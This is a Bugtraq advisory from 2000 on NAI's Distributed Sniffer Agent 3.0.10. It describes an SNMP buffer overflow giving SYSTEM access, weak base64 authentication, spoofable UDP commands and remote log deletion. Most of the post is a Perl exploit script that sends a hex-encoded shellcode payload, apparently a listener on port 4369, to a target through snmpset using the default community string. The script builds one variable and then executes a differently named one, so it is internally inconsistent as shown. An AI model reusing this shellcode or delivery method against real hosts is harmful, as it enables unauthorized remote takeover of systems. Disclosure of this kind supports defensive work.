Remotely exploitable buffer overflow in NAI's Distributed Sniffer Agent

[Kevin Start <kevin_start () HUSHMAIL COM>]

Bugtraq.

This 'advisory' details a number of problems with NAI's sniffer product.
They have fixed the problems in current versions on the sly so I have foregone
notifying the vendor. They saw fit to post an advisory on Microsoft's Netmon
today so 'all is fair in love and war' at least MS had the dignity to announce
their fixes.

As a side note I was working with the vulnhelp team at securityfocus but
have decided to just post this
given NAI's recent decision to throw rocks in this great glass house....




Date Published: November 2, 2000

Advisory ID: N/A

Bugtraq ID: N/A

CVE CAN: Non currently assigned.

Title: Remotely exploitable buffer overflow and protocol vulnerabilities
in NAI's Distributed Sniffer Agent

Class: Boundary Error Condition (Buffer Overflow)

Remotely Exploitable: Yes

Locally Exploitable: Yes

Vulnerability Description:

NAI's Distributed Sniffer Agent can be overflowed remotely to grant
SYSTEM privilege.  Additional vulnerabilities exist in the management
protocol to allow an attacker to recover logins passwords, take
control of the agent, and delete logs.

Vulnerable Packages/Systems:

Systems running the NAI Sniffer Agent. Tested with
Agent version 3.0.10 using Windows NT Workstation 4.0 SP6

Solution/Vendor Information/Workaround:
Fixed in current versions.

Additionally, advisories and information on security issues
of Network Associates roducts can be obtained from:

http://www.securityfocus.com/bid/1606
http://www.securityfocus.com/bid/1589
etc, etc, etc, etc.

Vendor notified on: Right about now....

Credits:

This advisory was drafted with the help of the SecurityFocus.com
Vulnerability Help Team. For more information or assistance drafting advisories
please
mail vulnhelp () securityfocus com.

Technical Description - Exploit/Concept Code:

1. The most severe problem was an overflow during SNMP
writes.  NAI elected to use a single community for both public
and private access simplifying the process of brute forcing
the community string.  Once this string has been guessed,
shellcode can be written into any accessible object (sysName,
for example).  The buffer is 256 bytes long with no character
restrictions as nulls are allowed when using hex mode as the SNMP
encoding.  This attack can be launched completely blind with one
spoofed UDP packet.  SYSTEM privilege can be gained using this
method.

2. Authentication was handled using base64 encoded logins and passwords.
Dsniff by Dugsong already includes a module for capturing logins
and passwords from the agent.  Base64 encoding was also used to
obfuscate changes to the agent's user database.


3. All remote access to the agent is handled using UDP.  Once a user
has authenticated to the agent, an attacker can inject his own
spoofed commands.  Full control of the agent can be gained
in this manner.  If the packet generation facility was enabled,
a packet flood could be initiated.

4. All data transferred from the agent is in cleartext, allowing an
attacker to recover data being sniffed on a remote network
segment.

5. Flooding the agent with false login requests can cause system
instability.  A kernel fault was caused during testing.

6. Logs can be deleted remotely, allowing an attacker to delete his
own brute forcing attempts once he is successful.

--- EXPLOIT ---

#!/usr/bin/perl

# exploit for NAI Sniffer Agent 3.0.10
# Silently patched in later versions, although customers
# were not notified.  No workaround was ever released.

$xoredport="88 88 ";  # (4369) port XORed with 0x99

$egg ="
eb 07 90 aa 1c 9c 77 90 90 90 33 c0 50 f7 d0 50 59 f2
af 59 b1 c6 8b c7 48 80 30 99 e2 fa 60 8d 85 70 fe
ff ff 50 68 01 01 00 00 bb 77 be 6b 77 ff d3 61
90 90 90 90 33 f6 96 bb 99 3c 60 47 c1 eb 08 56
ff 13 8b d0 fc 33 c9 b1 0b 49 32 c0 ac 84 c0 75
f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 32 c0
ac 84 c0 75 f9 b3 3c 56 ff 13 8b d0 fc 33 c9 b1
06 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13
ab 59 5a e2 ec 83 c6 05 33 c0 50 40 50 40 50 ff 57 e8 93 6a 10 56 53
ff 57 ec 6a 02 53 ff 57 f0 33 c0 57 50 b0 0c ab
58 ab 40 ab 5f 48 50 57 56 ad 56 ff 57 c0 48 50
57 ad 56 ad 56 ff 57 c0 48 b0 44 89 07 57 ff 57
c4 33 c0 8b 46 f4 89 47 3c 89 47 40 8b 06 89 47
38 33 c0 66 b8 01 01 89 47 2c 57 57 33 c0 50 50
50 40 50 48 50 50 ad 56 33 c0 50 ff 57 c8 ff 76
f0 ff 57 cc ff 76 fc ff 57 cc 48 50 50 53 ff 57
f4 8b d8 33 c0 b4 04 50 c1 e8 04 50 ff 57 d4 8b
f0 33 c0 8b c8 b5 04 50 50 57 51 50 ff 77 a8 ff
57 d0 83 3f 01 7c 22 33 c0 50 57 ff 37 56 ff 77
a8 ff 57 dc 0b c0 74 2f 33 c0 50 ff 37 56 53 ff
57 f8 6a 50 ff 57 e0 eb c8 33 c0 50 b4 04 50 56
53 ff 57 fc 57 33 c9 51 50 56 ff 77 ac ff 57 d8
6a 50 ff 57 e0 eb aa 50 ff 57 e4 90 d2 dc cb d7
dc d5 aa ab 99 da eb fc f8 ed fc c9 f0 e9 fc 99
de fc ed ca ed f8 eb ed ec e9 d0 f7 ff f6 d8 99
da eb fc f8 ed fc c9 eb f6 fa fc ea ea d8 99 da
f5 f6 ea fc d1 f8 f7 fd f5 fc 99 c9 fc fc f2 d7
f8 f4 fc fd c9 f0 e9 fc 99 de f5 f6 fb f8 f5 d8
f5 f5 f6 fa 99 ce eb f0 ed fc df f0 f5 fc 99 cb
fc f8 fd df f0 f5 fc 99 ca f5 fc fc e9 99 dc e1
f0 ed c9 eb f6 fa fc ea ea 99 ce ca d6 da d2 aa
ab 99 ea f6 fa f2 fc ed 99 fb f0 f7 fd 99 f5 f0
ea ed fc f7 99 f8 fa fa fc e9 ed 99 ea fc f7 fd
99 eb fc fa ef 99 9b 99  $xoredport 99 99 99 99
99 99 99 99 99 99 99 99 fa f4 fd b7 fc e1 fc 99
ff ff ff ff ";

$offset = "00 c7 12 00 ";

$snmpset = "/usr/bin/snmpset";
$community = "public";
$objid = "system.sysName.0";
$offcount = 80;
$nopcount = 200;

@execstring = ("\" ", $offset x $offcount, "90 "x $nopcount, $egg,"
\"");

$host="HOST TO 0WN";

exec ("$snmpset $host $community $objid x @sploitstring");